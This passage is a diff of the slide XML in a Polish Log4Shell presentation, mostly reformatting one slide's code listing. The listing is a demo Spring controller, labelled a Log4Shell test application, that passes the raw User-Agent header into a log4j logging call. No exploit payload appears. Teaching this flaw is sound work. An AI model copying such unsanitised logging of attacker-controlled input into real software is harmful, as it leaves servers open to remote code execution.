--- a/log4shell_admindays.pptx
+++ b/log4shell_admindays.pptx
@@ -14256,8 +14256,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2444262" y="832569"/>
-            <a:ext cx="9486900" cy="5016758"/>
+            <a:off x="2409972" y="0"/>
+            <a:ext cx="9486900" cy="6494045"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -14273,17 +14273,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14292,21 +14284,48 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>package com.eniac.logger;</a:t>
+              <a:t>package</a:t>
             </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>com.eniac.logger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600">
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="dk1"/>
               </a:solidFill>
@@ -14317,136 +14336,8 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>import org.springframework.web.bind.annotation.GetMapping;</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>import org.springframework.web.bind.annotation.RequestHeader;</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>import org.springframework.web.bind.annotation.RestController;</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>import org.apache.logging.log4j.LogManager;</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>import org.apache.logging.log4j.Logger;</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600">
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="dk1"/>
               </a:solidFill>
@@ -14457,17 +14348,9 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14476,22 +14359,10 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>@RestController</a:t>
+              <a:t>import </a:t>
             </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14500,21 +14371,102 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>public class MainController {</a:t>
+              <a:t>org.springframework.web.bind.annotation.GetMapping</a:t>
             </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600">
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>import </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>org.springframework.web.bind.annotation.RequestHeader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>import </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>org.springframework.web.bind.annotation.RestController</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="dk1"/>
               </a:solidFill>
@@ -14525,17 +14477,9 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14544,22 +14488,13 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>    private static final Logger logger = LogManager.getLogger("HelloWorld");</a:t>
+              <a:t>import org.apache.logging.log4j.LogManager;</a:t>
             </a:r>
-            <a:endParaRPr/>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14568,21 +14503,12 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>    private int counter = 0;</a:t>
+              <a:t>import org.apache.logging.log4j.Logger;</a:t>
             </a:r>
-            <a:endParaRPr/>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600">
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="dk1"/>
               </a:solidFill>
@@ -14593,17 +14519,9 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14612,22 +14530,10 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>    @GetMapping("/")</a:t>
+              <a:t>@</a:t>
             </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14636,22 +14542,22 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>    public String index(@RequestHeader("User-Agent") String userAgent) {</a:t>
+              <a:t>RestController</a:t>
             </a:r>
-            <a:endParaRPr/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1"/>
+              </a:solidFill>
+              <a:latin typeface="Courier New"/>
+              <a:ea typeface="Courier New"/>
+              <a:cs typeface="Courier New"/>
+              <a:sym typeface="Courier New"/>
+            </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14660,22 +14566,10 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>        logger.info("Received a request from User-Agent:" + userAgent);</a:t>
+              <a:t>public </a:t>
             </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
                 <a:solidFill>
                   <a:schemeClr val="dk1"/>
                 </a:solidFill>
@@ -14684,22 +14578,781 @@
                 <a:cs typeface="Courier New"/>
                 <a:sym typeface="Courier New"/>
               </a:rPr>
-              <a:t>        return "Log4Shell testowa aplikacja."+Integer.toString(counter++);</a:t>
+              <a:t>class</a:t>
             </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>MainController</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> {</a:t>
+            </a:r>
           </a:p>
           <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1"/>
+              </a:solidFill>
+              <a:latin typeface="Courier New"/>
+              <a:ea typeface="Courier New"/>
+              <a:cs typeface="Courier New"/>
+              <a:sym typeface="Courier New"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
             <a:r>
-              <a:rPr lang="pl-PL" sz="1600">
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>private</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>static</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>final</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>Logger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>logger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>LogManager.getLogger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("l4s-app2");</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>private</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>int</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>counter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t> = 0;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1"/>
+              </a:solidFill>
+              <a:latin typeface="Courier New"/>
+              <a:ea typeface="Courier New"/>
+              <a:cs typeface="Courier New"/>
+              <a:sym typeface="Courier New"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>    @</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>GetMapping</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>("/")</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
+                <a:ea typeface="Courier New"/>
+                <a:cs typeface="Courier New"/>
+                <a:sym typeface="Courier New"/>
+              </a:rPr>
+              <a:t>    public String </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="dk1"/>
+                </a:solidFill>
+                <a:latin typeface="Courier New"/>
